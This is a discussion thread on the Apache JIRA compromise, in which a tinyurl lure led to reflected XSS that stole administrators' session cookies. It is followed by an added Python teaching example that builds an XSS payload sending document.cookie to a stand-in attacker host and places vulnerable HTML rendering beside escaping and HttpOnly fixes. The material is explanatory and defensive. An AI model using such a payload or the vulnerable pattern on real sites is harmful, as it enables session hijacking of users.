Interesting attack, but depends on user fail (Score:2)
FTA:
On April 5th, the attackers, via a compromised Slicehost server, opened a new issue, INFRA-2591. This issue contained the following text:
"ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured]..."
This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross-site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged in to JIRA. When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights.
Oops...check those URLs, admins...
Re:Interesting attack, but depends on user fail (Score:2)
But clicking on a link should never be dangerous, so for this to work there must be a bug in their bug-tracking software.
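The quoted write-up and the reply above describe a reflected XSS bug: a link that the bug tracker itself turns into script running in the victim's session. The following is an added example, not code from the thread, from Apache or from JIRA, showing the shape of such a bug beside its fix. The error-page template, the URL, the attacker host (attacker.invalid) and the cookie name JSESSIONID are all hypothetical; the attack link is constructed for the example.

```python
# Added example (not from the Slashdot thread, Apache or JIRA): a minimal
# reflected-XSS bug of the kind that lets a crafted link steal a session cookie,
# beside the hardened rendering and the cookie flags that limit the damage.
# URL, host, cookie name and page template are hypothetical.
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed attacker link. The "error" parameter is reflected into the page;
# the payload sends document.cookie to a hypothetical attacker host.
ATTACK_URL = (
    "https://jira.example.invalid/error.jsp?error="
    "%3Cscript%3Enew%20Image().src%3D%27https%3A%2F%2Fattacker.invalid%2Fc%3F%27"
    "%2BencodeURIComponent(document.cookie)%3C%2Fscript%3E"
)


def reflected_param(url: str, name: str) -> str:
    """Return the first value of query parameter `name`, URL-decoded, or ''."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_error_vulnerable(msg: str) -> str:
    """Vulnerable: the request parameter is concatenated straight into HTML,
    so a <script> tag in it is parsed and executed by the victim's browser."""
    return "<html><body><p>Error: " + msg + "</p></body></html>"


def render_error_hardened(msg: str) -> str:
    """Fixed: HTML-escape the value before inserting it into an HTML text
    context, so '<' becomes '&lt;' and no tag is created."""
    return "<html><body><p>Error: " + escape(msg, quote=True) + "</p></body></html>"


def session_cookie_header(value: str, http_only: bool, secure: bool = True) -> str:
    """Build a Set-Cookie header for the session id (cookie name hypothetical).
    HttpOnly keeps the value out of document.cookie, so the payload above
    would exfiltrate nothing even if the XSS itself were still present."""
    attrs = ["JSESSIONID=" + value, "Path=/", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    if http_only:
        attrs.append("HttpOnly")
    return "Set-Cookie: " + "; ".join(attrs)


def script_injected(html: str) -> bool:
    """Crude check used by the demo: does the rendered page contain a live
    <script> tag (as opposed to an escaped '&lt;script')?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    payload = reflected_param(ATTACK_URL, "error")
    print("decoded parameter:", payload)
    print("vulnerable page runs script:", script_injected(render_error_vulnerable(payload)))
    print("hardened page runs script:  ", script_injected(render_error_hardened(payload)))
    print(session_cookie_header("abc123", http_only=True))
```

Two caveats a practitioner would add: the escaping shown is correct only for an HTML text context (an attribute, URL or JavaScript context needs its own encoding), and HttpOnly stops this particular cookie-theft payload but not the XSS itself; script running in an administrator's page can still issue requests in that session (for example via XMLHttpRequest) without ever reading the cookie, so the output encoding is the real fix and the cookie flag is defence in depth.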